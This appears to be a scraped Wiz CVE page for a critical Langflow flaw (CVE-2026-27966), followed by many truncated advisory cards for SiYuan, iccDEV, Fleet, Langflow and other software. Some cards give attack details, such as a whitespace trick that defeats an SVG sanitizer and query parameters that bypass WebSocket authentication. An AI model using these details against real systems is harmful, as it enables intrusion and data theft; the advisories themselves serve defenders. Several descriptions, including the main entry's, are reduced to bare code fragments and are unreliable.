CVE-2026-27966 [CRITICAL] CVE-2026-27966 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27966 :
Homebrew vulnerability analysis and mitigation
allow_dangerous_code=True
python_repl_ast
Source : NVD
## 9.8
Score
Published February 26, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
LangFlow
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
langflow
Sources
NVD
pip Severity CRITICAL No Fix Added at: Mar 02, 2026
Homebrew Severity CRITICAL Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Wiz
CVE-2026-0768 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-0768 [CRITICAL] CVE-2026-0768 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0768 :
Homebrew vulnerability analysis and mitigation
Langflow code Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the code parameter provided to the validate endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of root.
. Was ZDI-CAN-27322.
Source : NVD
## 9.8
Score
Published January 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploi
Wiz
CVE-2026-24004 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-24004 [LOW] CVE-2026-24004 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24004 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. In versions prior to 4.80.1, a vulnerability in Fleet’s Android MDM Pub/Sub handling could allow unauthenticated requests to trigger device unenrollment events. This may result in unauthorized removal of individual Android devices from Fleet management. If Android MDM is enabled, an attacker could send a crafted request to the Android Pub/Sub endpoint to unenroll a targeted Android device from Fleet without authentication. This issue does not grant access to Fleet, allow execution of commands, or provide visibility into device data. Impact is limited to disruption of Android device management for the affected device. Version 4.80.1 fixes the issue. If an immediate upgrade i
Wiz
CVE-2025-64735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-64735 [MEDIUM] CVE-2025-64735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64735 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-34388 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-34388 [MEDIUM] CVE-2026-34388 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34388 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.0, a denial-of-service vulnerability in Fleet's gRPC Launcher endpoint allows an authenticated host to crash the entire Fleet server process by sending an unexpected log type value. The server terminates immediately, disrupting all connected hosts, MDM enrollments, and API consumers. Version 4.81.0 patches the issue.
Source : NVD
## 6.6
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.co
Wiz
CVE-2026-32815 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32815 [MEDIUM] CVE-2026-32815 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32815 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the WebSocket endpoint (/ws) allows unauthenticated connections when specific URL parameters are provided (?app=siyuan&id=auth&type=auth). This bypass, intended for the login page to keep the kernel alive, allows any external client — including malicious websites via cross-origin WebSocket — to connect and receive all server push events in real-time. These events leak sensitive document metadata including document titles, notebook names, file paths, and all CRUD operations performed by authenticated users. Combined with the absence of Origin header validation, a malicious website can silently connect to a victim's local SiYuan instance and moni
Wiz
CVE-2026-2858 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2858 [MEDIUM] CVE-2026-2858 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2858 :
Homebrew vulnerability analysis and mitigation
A vulnerability was identified in wren-lang wren up to 0.4.0. This affects the function peekChar of the file src/vm/wren_compiler.c of the component Source File Parser. Such manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2025-66617 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-66617 [MEDIUM] CVE-2025-66617 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66617 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-26320 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-26320 [HIGH] CVE-2026-26320 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26320 :
Homebrew vulnerability analysis and mitigation
openclaw://
openclaw://agent
key
key
Source : NVD
## 7.1
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
Wiz
CVE-2026-33150 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-33150 [HIGH] CVE-2026-33150 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33150 :
Homebrew vulnerability analysis and mitigation
libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a use-after-free vulnerability in the io_uring subsystem of libfuse allows a local attacker to crash FUSE filesystem processes and potentially execute arbitrary code. When io_uring thread creation fails due to resource exhaustion (e.g., cgroup pids.max), fuse_uring_start() frees the ring pool structure but stores the dangling pointer in the session state, leading to a use-after-free when the session shuts down. The trigger is reliable in containerized environments where cgroup pids.max limits naturally constrain thread creation. This issue has been patched in version 3.18.2.
Source : NVD
## 7.8
Score
Published Ma
Wiz
CVE-2026-31809 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-31809 [CRITICAL] CVE-2026-31809 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31809 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.5.10, SiYuan's SVG sanitizer (SanitizeSVG) checks href attributes for the javascript: prefix using strings.HasPrefix(). However, inserting ASCII tab ( ), newline (
), or carriage return (
) characters inside the javascript: string bypasses this prefix check. Browsers strip these characters per the WHATWG URL specification before parsing the URL scheme, so the JavaScript still executes. This allows an attacker to inject executable JavaScript into the unauthenticated /api/icon/getDynamicIcon endpoint, creating a reflected XSS. This is a second bypass of the fix for CVE-2026-29183 (fixed in v3.5.9). This vulnerability is fixed in 3.5.10.
Source : NVD
## 6.4
Sc
Wiz
CVE-2026-33203 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33203 [HIGH] CVE-2026-33203 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33203 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the SiYuan kernel WebSocket server accepts unauthenticated connections when a specific "auth keepalive" query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON. A remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service. Version 3.6.2 fixes the issue.
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probab
Wiz
CVE-2026-32750 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32750 [MEDIUM] CVE-2026-32750 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32750 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, POST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users. Data persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges. This issue has been fixed in version 3.6.1.
Sour
Wiz
CVE-2026-21691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-21691 [MEDIUM] CVE-2026-21691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21691 :
Homebrew vulnerability analysis and mitigation
CIccTag:IsTypeCompressed()
Source : NVD
## 6.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE
Wiz
CVE-2026-25634 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25634 [HIGH] CVE-2026-25634 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25634 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int IccTagMPE.cpp. This vulnerability is fixed in 2.3.1.4.
Source : NVD
## 7.8
Score
Published February 6, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Feb 20, 2026
## Get a CV
Wiz
CVE-2026-32704 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-32704 [MEDIUM] CVE-2026-32704 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32704 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.6.1, POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes. This vulnerability is fixed in 3.6.1.
Source : NVD
## 6.5
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
github.com/siyuan-note/siyuan/kernel
siyuan
Sources
NVD
Wiz
CVE-2025-61979 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-61979 [MEDIUM] CVE-2025-61979 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61979 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-24410 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24410 [HIGH] CVE-2026-24410 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24410 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Deference in CIccProfileXml::ParseBasic(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Wiz
CVE-2026-21495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21495 [MEDIUM] CVE-2026-21495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21495 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to division by zero in the TIFF Image Reader. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-24852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-24852 [MEDIUM] CVE-2026-24852 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24852 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, a heap buffer over-read when the strlen() function attempts to read a non-null-terminated buffer potentially leaking heap memory contents and causing application termination. This vulnerability affects users of the iccDEV library who process ICC color profiles. ICC Profile Injection vulnerabilities arise when user-controllable input is incorporated into ICC profile data or other structured binary blobs in an unsafe manner. Version 2.3.1.2 contains a fix for the issue. No known workarounds are available.
Source : NVD
## 8.1
Score
Published January 28, 2
Wiz
CVE-2026-24403 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24403 [HIGH] CVE-2026-24403 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24403 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or DoS, potentially enabling arbitrary Code Execution or bypassing application logic. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date
Wiz
CVE-2026-22685 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-22685 [HIGH] CVE-2026-22685 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22685 :
Homebrew vulnerability analysis and mitigation
DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../…/target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user’s system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or
Wiz
CVE-2026-32627 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32627 [HIGH] CVE-2026-32627 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32627 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.37.2, when a cpp-httplib client is configured with a proxy and set_follow_location(true), any HTTPS redirect it follows will have TLS certificate and hostname verification silently disabled on the new connection. The client will accept any certificate presented by the redirect target — expired, self-signed, or forged — without raising an error or notifying the application. A network attacker in a position to return a redirect response can fully intercept the follow-up HTTPS connection, including any credentials or session tokens in flight. This vulnerability is fixed in 0.37.2.
Source : NVD
## 8.1
Score
Published March 16, 2
Wiz
CVE-2025-65803 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-65803 [MEDIUM] CVE-2025-65803 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65803 :
Homebrew vulnerability analysis and mitigation
An integer overflow in the psdParser::ReadImageData function of FreeImage v3.18.0 and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted PSD file.
Source : NVD
## 6.5
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
freeimage
Sources
NVD
Alpine 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, edge Severity MEDIUM No Fix Added at: Dec 21, 2025
Alpine 3.22, 3.23 Severity MEDIUM No Fix Add
Wiz
CVE-2026-21693 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21693 [HIGH] CVE-2026-21693 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21693 :
Homebrew vulnerability analysis and mitigation
CIccSegmentedCurveXml::ToXml()
IccXML/IccLibXML/IccMpeXml.cpp
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV explo
Wiz
CVE-2026-21688 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21688 [HIGH] CVE-2026-21688 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21688 :
Homebrew vulnerability analysis and mitigation
SIccCalcOp::ArgsPushed()
IccProfLib/IccMpeCalc.cpp
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-33897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-33897 [CRITICAL] CVE-2026-33897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33897 :
Homebrew vulnerability analysis and mitigation
Incus is a system container and virtual machine manager. Prior to version 6.23.0, instance template files can be used to cause arbitrary read or writes as root on the host server. Incus allows for pongo2 templates within instances which can be used at various times in the instance lifecycle to template files inside of the instance. This particular implementation of pongo2 within Incus allowed for file read/write but with the expectation that the pongo2 chroot feature would isolate all such access to the instance's filesystem. This was allowed such that a template could theoretically read a file and then generate a new version of said file. Unfortunately the chroot isolation mechanism is entirely skipped by pongo2 leading
Wiz
CVE-2025-66342 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-66342 [HIGH] CVE-2025-66342 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66342 :
Homebrew vulnerability analysis and mitigation
A type confusion vulnerability exists in the EMF functionality of Canva Affinity. A specially crafted EMF file can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution.
Source : NVD
## 7.8
Score
Published March 17, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus o
Wiz
CVE-2026-21690 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-21690 [MEDIUM] CVE-2026-21690 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21690 :
Homebrew vulnerability analysis and mitigation
CIccTagXmlTagData::ToXml()
Source : NVD
## 6.3
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 29.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE
Wiz
CVE-2026-26060 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2026-26060 [MEDIUM] CVE-2026-26060 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26060 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.0, a vulnerability in Fleet’s password management logic could allow previously issued password reset tokens to remain valid after a user changes their password. As a result, a stale password reset token could be reused to reset the account password even after a defensive password change. Version 4.81.0 patches the issue.
Source : NVD
## 6
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.0
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
github.
Wiz
CVE-2026-0772 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-0772 [HIGH] CVE-2026-0772 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0772 :
Homebrew vulnerability analysis and mitigation
Langflow Disk Cache Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is required to exploit this vulnerability.
The specific flaw exists within the disk cache service. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27919.
Source : NVD
## 7.5
Score
Published January 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-23852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-23852 [MEDIUM] CVE-2026-23852 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23852 :
Homebrew vulnerability analysis and mitigation
icon
/api/attr/setBlockAttrs
#15970
Source : NVD
## 5.8
Score
Published January 19, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 41
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
siyuan
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at: Feb 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publish
Wiz
CVE-2026-28216 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-28216 [HIGH] CVE-2026-28216 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28216 :
Homebrew vulnerability analysis and mitigation
user-environments.resolver.ts:82-109
updateUserEnvironment
@UseGuards(GqlAuthGuard)
@GqlUser()
prisma.userEnvironment.update({ where: { id } })
deleteUserEnvironment
Source : NVD
## 8.3
Score
Published February 26, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
hoppscotch
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
Wiz
CVE-2025-64301 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-64301 [HIGH] CVE-2025-64301 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64301 :
Homebrew vulnerability analysis and mitigation
An out‑of‑bounds write vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out‑of‑bounds write, potentially leading to code execution.
Source : NVD
## 7.8
Score
Published March 17, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in yo
Wiz
CVE-2026-23847 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
